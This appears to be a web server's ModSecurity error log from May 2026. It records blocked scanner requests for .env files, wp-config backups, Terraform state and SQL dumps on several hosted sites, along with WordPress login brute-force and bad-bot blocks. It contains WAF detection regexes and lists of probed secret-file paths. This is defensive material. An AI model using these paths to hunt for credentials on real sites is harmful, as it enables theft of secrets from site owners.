[Tue May 26 14:49:15.693142 2026] [security2:error] [pid 648203:tid 648370] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlk7EQDDtxJNiDrdTk1wAAAKo"]
[Tue May 26 14:49:15.958474 2026] [security2:error] [pid 648203:tid 648356] [client 195.178.110.199:56276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stripe/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTk7QAAAJw"]
[Tue May 26 14:49:15.997637 2026] [security2:error] [pid 648203:tid 648402] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v1/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTk9gAAAMo"]
[Tue May 26 14:49:16.023225 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v2/.env"] [unique_id "ahVllLEQDDtxJNiDrdTk-AAAAQQ"]
[Tue May 26 14:49:16.023820 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/v3/.env"] [unique_id "ahVllLEQDDtxJNiDrdTk-QAAAP4"]
[Tue May 26 14:49:16.447406 2026] [security2:error] [pid 648203:tid 648425] [client 209.50.168.133:13957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlk7EQDDtxJNiDrdTkuwAAAOE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:16.457860 2026] [security2:error] [pid 648203:tid 648399] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlk7EQDDtxJNiDrdTk7AAAAMc"]
[Tue May 26 14:49:16.459182 2026] [security2:error] [pid 648203:tid 648421] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlk7EQDDtxJNiDrdTk9AAAAN0"]
[Tue May 26 14:49:16.800016 2026] [security2:error] [pid 648203:tid 648369] [client 195.178.110.199:56168] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlLgAAAKk"]
[Tue May 26 14:49:16.826464 2026] [security2:error] [pid 648203:tid 648426] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/var/www/html/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlMQAAAOI"]
[Tue May 26 14:49:16.844873 2026] [security2:error] [pid 648203:tid 648377] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/website/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlMwAAALE"]
[Tue May 26 14:49:16.951611 2026] [security2:error] [pid 648203:tid 648450] [client 195.178.110.199:56252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/web/.env"] [unique_id "ahVllLEQDDtxJNiDrdTlNgAAAPo"]
[Tue May 26 14:49:16.953220 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:56168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php"] [unique_id "ahVllLEQDDtxJNiDrdTlOAAAAI0"]
[Tue May 26 14:49:16.959688 2026] [security2:error] [pid 648203:tid 648408] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.bak"] [unique_id "ahVllLEQDDtxJNiDrdTlOgAAANA"]
[Tue May 26 14:49:16.959866 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.new"] [unique_id "ahVllLEQDDtxJNiDrdTlOwAAAQQ"]
[Tue May 26 14:49:16.973376 2026] [security2:error] [pid 648203:tid 648447] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com"] [uri "/wp-config.php.old"] [unique_id "ahVllLEQDDtxJNiDrdTlPQAAAPc"]
[Tue May 26 14:49:17.265046 2026] [security2:error] [pid 648203:tid 648402] [client 69.48.202.178:62629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlQQAAAMo"], referer: https://www.cagmedya.com/erzurum-web-tasarim/
[Tue May 26 14:49:17.319794 2026] [security2:error] [pid 648203:tid 648241] [remote 47.251.53.97:58030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.53.251.47.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlSwAAkiU"]
[Tue May 26 14:49:18.548124 2026] [security2:error] [pid 648203:tid 648440] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVllrEQDDtxJNiDrdTlggAAAPA"]
[Tue May 26 14:49:18.628264 2026] [security2:error] [pid 648203:tid 648404] [client 104.207.54.255:28197] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVllbEQDDtxJNiDrdTlWgAAAMw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:18.762895 2026] [security2:error] [pid 648203:tid 648457] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVllrEQDDtxJNiDrdTlfgAAAQE"]
[Tue May 26 14:49:19.064834 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.5:4558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/settings.php"] [unique_id "ahVll7EQDDtxJNiDrdTlmAAAALI"]
[Tue May 26 14:49:19.986013 2026] [security2:error] [pid 648203:tid 648454] [client 74.249.173.207:27849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/admin.php"] [unique_id "ahVll7EQDDtxJNiDrdTlsQAAAP4"]
[Tue May 26 14:49:20.107555 2026] [security2:error] [pid 648203:tid 648451] [client 185.191.171.9:18892] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVlmLEQDDtxJNiDrdTlswAAAPs"]
[Tue May 26 14:49:20.107719 2026] [security2:error] [pid 648203:tid 648451] [client 185.191.171.9:18892] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/2/"] [unique_id "ahVlmLEQDDtxJNiDrdTlswAAAPs"]
[Tue May 26 14:49:20.768681 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.5:48482] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php"] [unique_id "ahVlmLEQDDtxJNiDrdTlzQAAAL4"]
[Tue May 26 14:49:20.872178 2026] [security2:error] [pid 648203:tid 648444] [client 209.50.171.15:44027] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVll7EQDDtxJNiDrdTlqQAAAPQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:21.265581 2026] [security2:error] [pid 648203:tid 648407] [client 114.119.156.126:54321] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/products/chocolate-mauris-sodales/"] [unique_id "ahVlmbEQDDtxJNiDrdTl5gAAAM8"], referer: http://haddingtonwines.com/product-category/gift-items-chocolates/page/2
[Tue May 26 14:49:21.676450 2026] [security2:error] [pid 648203:tid 648406] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlmbEQDDtxJNiDrdTl5QAAAM4"]
[Tue May 26 14:49:22.804649 2026] [core:error] [pid 648203:tid 648405] [client 5.255.231.2:57914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:49:22.804667 2026] [core:error] [pid 648203:tid 648405] [client 5.255.231.2:57914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:49:23.057308 2026] [security2:error] [pid 648203:tid 648447] [client 104.207.63.32:32907] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlmbEQDDtxJNiDrdTmAAAAAPc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:23.073969 2026] [security2:error] [pid 648203:tid 648352] [client 64.89.163.250:57721] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "anujtradingco.com"] [uri "/"] [unique_id "ahVlm7EQDDtxJNiDrdTmJAAAAJg"]
[Tue May 26 14:49:23.839735 2026] [security2:error] [pid 648203:tid 648353] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlm7EQDDtxJNiDrdTmLwAAAJk"]
[Tue May 26 14:49:25.190592 2026] [security2:error] [pid 648203:tid 648445] [client 45.3.32.46:20845] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlnLEQDDtxJNiDrdTmPwAAAPU"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:26.015361 2026] [security2:error] [pid 648203:tid 648339] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlnbEQDDtxJNiDrdTmZgAAAIs"]
[Tue May 26 14:49:26.608893 2026] [security2:error] [pid 648203:tid 648288] [remote 111.229.141.137:56522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVlnrEQDDtxJNiDrdTmfQAA61Q"]
[Tue May 26 14:49:27.383282 2026] [security2:error] [pid 648203:tid 648389] [client 45.3.36.80:64483] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlnrEQDDtxJNiDrdTmewAAAL0"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:28.310430 2026] [security2:error] [pid 648203:tid 648454] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVln7EQDDtxJNiDrdTmqgAAAP4"]
[Tue May 26 14:49:29.567220 2026] [security2:error] [pid 648203:tid 648377] [client 104.207.52.181:58993] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVloLEQDDtxJNiDrdTmuAAAALE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:29.647716 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.5:48486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config.php.bak"] [unique_id "ahVlobEQDDtxJNiDrdTm2QAAANk"]
[Tue May 26 14:49:30.464317 2026] [security2:error] [pid 648203:tid 648371] [client 176.65.139.232:62568] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "wpdev.wrapmachines.com"] [uri "/.env"] [unique_id "ahVlorEQDDtxJNiDrdTm8gAAAKs"]
[Tue May 26 14:49:30.503030 2026] [security2:error] [pid 648203:tid 648346] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlorEQDDtxJNiDrdTm7AAAAJI"]
[Tue May 26 14:49:31.192803 2026] [security2:error] [pid 648203:tid 648399] [client 14.226.13.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlorEQDDtxJNiDrdTm_wAAAMc"]
[Tue May 26 14:49:31.631689 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnKwAAyGw"]
[Tue May 26 14:49:31.798910 2026] [security2:error] [pid 648203:tid 648383] [client 216.26.244.92:27951] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlorEQDDtxJNiDrdTm-AAAALc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:32.506434 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnOQAAANA"]
[Tue May 26 14:49:32.506984 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnOwAAAOs"]
[Tue May 26 14:49:32.509420 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnVgAAyGU"]
[Tue May 26 14:49:32.510228 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/.env"] [unique_id "ahVlo7EQDDtxJNiDrdTnWQAAyGU"]
[Tue May 26 14:49:32.510545 2026] [security2:error] [pid 648203:tid 648316] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.leakyleaks.moes-art.com"] [uri "/*update.cgi*"] [unique_id "ahVlo7EQDDtxJNiDrdTnUQAAyHA"]
[Tue May 26 14:49:32.538446 2026] [security2:error] [pid 648203:tid 648415] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnNwAAANc"]
[Tue May 26 14:49:32.539983 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnPQAAAN0"]
[Tue May 26 14:49:32.552780 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlo7EQDDtxJNiDrdTnQAAAyGk"]
[Tue May 26 14:49:32.584580 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpLEQDDtxJNiDrdTnZgAAAMI"]
